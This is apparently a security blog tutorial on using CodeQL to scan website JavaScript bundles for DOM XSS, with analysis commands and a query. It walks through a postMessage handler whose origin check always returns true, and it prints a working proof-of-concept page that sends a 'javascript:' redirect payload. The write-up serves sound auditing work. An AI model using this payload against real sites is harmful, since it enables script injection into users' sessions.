GitHub’s CodeQL is a robust query language originally developed by Semmle that allows you to look for vulnerabilities in the source code. CodeQL is known as a tool to inspect open source repositories, however its usage is not limited just to it. In this article I will delve into approaches on how to use CodeQL for web application audits, specifically to discover client-side vulnerabilities.
The idea of CodeQL is to treat source code as a database which can be queried using SQL-like statements. There are lots of languages supported among which is JavaScript. For JavaScript both server-side and client-side flavours are supported. JS CodeQL understands modern editions such as ES6 as well as frameworks like React (with JSX) and Angular.
CodeQL is not just grep as it supports taint tracking which allows you to test if a given user input (a source) can reach a vulnerable function (a sink). This is especially useful when dealing with DOM-based Cross Site Scripting vulnerabilities. By tainting a user-supplied DOM property such as location.hash one can test if this value actually reaches one of the XSS sinks, e.g. document.innerHTML or document.write().
The common use-case for CodeQL is to run a query suite against open-source code repositories. To do so you may install CodeQL locally or use https://lgtm.com/. For the latter case you should specify a GitHub repository URL and add it as your project. If a repository is popular enough you will get a list of alerts as somebody already attempted to use CodeQL on it. You may also run your own queries to find something that is not covered by LGTM default query suite. However, CodeQL can be used not just to scan repositories, but also to find bugs on any website on the internet.
Popular web vulnerability scanners like Burp Suite have built-in JavaScript analyzers which scan any JS file found on the website to discover client-side vulnerabilities, primarily DOM XSS. Although they produce some meaningful results, subtle bugs stay under the radar. This is where CodeQL comes into play, it can complement JS source code analysis in any security assessment.
Modern web applications tend to shift business logic from the server to the client. Typically the whole application can be found in a single JS file compiled with bundlers like webpack. In order to scan such bundles with CodeQL it is necessary to perform the following steps. Firstly, all the JS links should be gathered and downloaded. For this task one can use subjs to find JS links and then meg or just wget to download all of them. After that one needs to build a CodeQL database from the gathered files using the command:
codeql database create example.com --language=javascript
After the database is built it is time to launch the actual scanning:
codeql database analyze example.com javascript-lgtm.qls --format=sarif-latest --output=results.sarif
This command uses default LGTM.com’s query suite (javascript-lgtm.qls) and saves the results in Sarif format which can be later loaded in VSCode with the help of Sarif Viewer extension.
If you analyze bundles produced by webpack, the number of issues may be overwhelming for manual review. That is why it is always better to analyze unminified source code instead. When building with webpack, one may choose to include source mappings which can ease the debugging. With the source mappings it is possible to recover the original code. Web browsers automatically detect, fetch and interpret source mappings:
However, it is not possible to save unpacked source code from a browser, so we will have to use a special tool called unwebpack-sourcemap. With it the procedure is as easy as:
./unwebpack_sourcemap.py --detect https://example.com/auth/login example.com
After building and analyzing CodeQL database once again we can observe that the number of findings is much fewer and the results are significantly more relevant.
CodeQL allows you to look for not only vulnerabilities but also code quality issues that might present a security risk after a manual review. Here is an example of such an issue that resulted in a DOM XSS on a popular website found with the help of CodeQL.
After an initial scanning the following finding looked interesting:
Looking at the source code we see that the function isCompanyDomain() is called with origin argument inside receivePostMessage() function:
export const receivePostMessage = (e = {}) => {
const { origin, data } = e;
if (isCompanyDomain(origin)) {
return data;
}
return null;
};
Let’s have a look at isCompanyDomain() function:
const isCompanyDomain = () => true;
Now we understand why CodeQL reported this piece of code: it ignores origin argument and always returns true. The code looks like a security check, so it might be a bypass, let’s find all the occurrences of receivePostMessage() calls with the following CodeQL query:
import javascript
from InvokeExpr call
where
call.getCalleeName() = "receivePostMessage"
select call
This gives us the following result:
handleSsoPopupMessage = (e) => {
const messageObj = receivePostMessage.call(this, e);
if (messageObj) {
const { message, props } = messageObj;
switch (message) {
case 'SSO_ACTION_SUCCESS':
this.trackSuccess({
method: props.oauthProvider,
action: props.action,
eventCallback: () => redirect(props.redirectUri),
});
break;
}
}
};
As you can see the function handleSsoPopupMessage() is a postMessage event handler which supposedly should be protected with isCompanyDomain() checking the origin of the message. However it always returns true which looks like a technical debt of the frontend developers. Message handlers are a common source of DOM-based XSS vulnerabilities if left unprotected from external interaction. This is the case as the user-supplied argument redirectUri is passed into the redirect() function which effectively leads to an XSS using a payload with javascript: scheme. The PoC looks as follows:
<a href="#" onclick="xss()">click me</a>
<script>
function xss() {
var win = window.open('https://example.com/auth/login', '_blank');
setTimeout(function() {
win.postMessage({
'message': 'SSO_ACTION_SUCCESS',
"props": {
"oauthProvider": "test",
"action": "test",
"redirectUri": "javascript:alert(document.location)"
}
}, "*");
}, 5000);
}
</script>
CodeQL can complement existing source code analysis tools, for instance Burp Suite’s built-in JS analyzer. However, the real value of CodeQL is that it allows you to create custom checks that can be run on each JS code bundle found on a website. Please keep in mind that if you are not conducting academic research, CodeQL license requires permission from a web site owner. I strongly recommend giving a try to GitHub Security Lab CTF 3 to understand how to leverage CodeQL potential in web application assessments. I also suggest installing CodeQL CLI locally as well as VSCode extension for faster on-boarding and a more convenient access to the tool.
An audit of large code bases always involves automated tools, especially in the area of web applications. With the business logic shifting towards client-side, CodeQL offers an effective approach to spot vulnerabilities in JavaScript bundles using the customized queries. Hope this tutorial will make CodeQL a part of your web application assessment routine.
Leave a Reply